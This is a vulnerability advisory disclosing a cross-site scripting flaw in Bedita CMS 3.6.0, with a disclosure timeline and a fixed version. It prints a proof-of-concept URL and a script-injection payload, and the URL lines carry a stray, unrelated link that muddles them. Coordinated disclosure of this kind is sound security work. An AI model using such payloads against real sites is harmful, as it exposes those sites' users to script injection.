================================================================
Bedita 3.6.0 – Cross-Site Scripting Vulnerability
================================================================
Information
**********************
Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.6.0
Severity: Medium
Author – Arjun Basnet
CVE-ID: N/A
Homepage: http://www.bedita.com/
Description
***********************
Bedita is prone to URI based Cross-site scripting vulnerability because it
fails to sanitize user-supplied input. An attacker may leverage this issue
to execute arbitrary script code
in the browser of an unsuspecting user of the affected site.
Proof of Concept URL
***************************
[+] http://localhost
<http://localhost/ocportal/data/emoticons.php?field_name=post&keep_session=1>
/bedita/beditaapp/pages/showObjects/2/0/0/leafs"><script>alert(1);</script>
Affected URL
*****************
[+] http://localhost
<http://localhost/ocportal/data/emoticons.php?field_name=post&keep_session=1>
/bedita/beditaapp/pages/showObjects/2/0/0/leafs
Payload
=======================
"><script>alert(1);</script>
Advisory Information:
================================================
Bedita CMS XSS Vulnerability
Severity Level:
=========================================================
Medium
Description:
==========================================================
Vulnerable Product:
[+] Bedita 3.6.0
Advisory Timeline
************************
14-Oct-2015- Reported
14-Oct-2015- Vendor Response
11-Dec-2015- Vendor Released Fixed version
12-Dec-2015- Public disclosed
Fixed Version:
*****************
[+] Bedita 3.7.0 (http://www.bedita.com/home-be/be-download-2)
Reference
*****************
[+] https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Credits & Authors
************************
Arjun Basnet from Cyber Security Works Pvt. Ltd. (
http://cybersecurityworks.com)
--
----------
Cheers !!!
Team CSW Research Lab <http://www.cybersecurityworks.com>
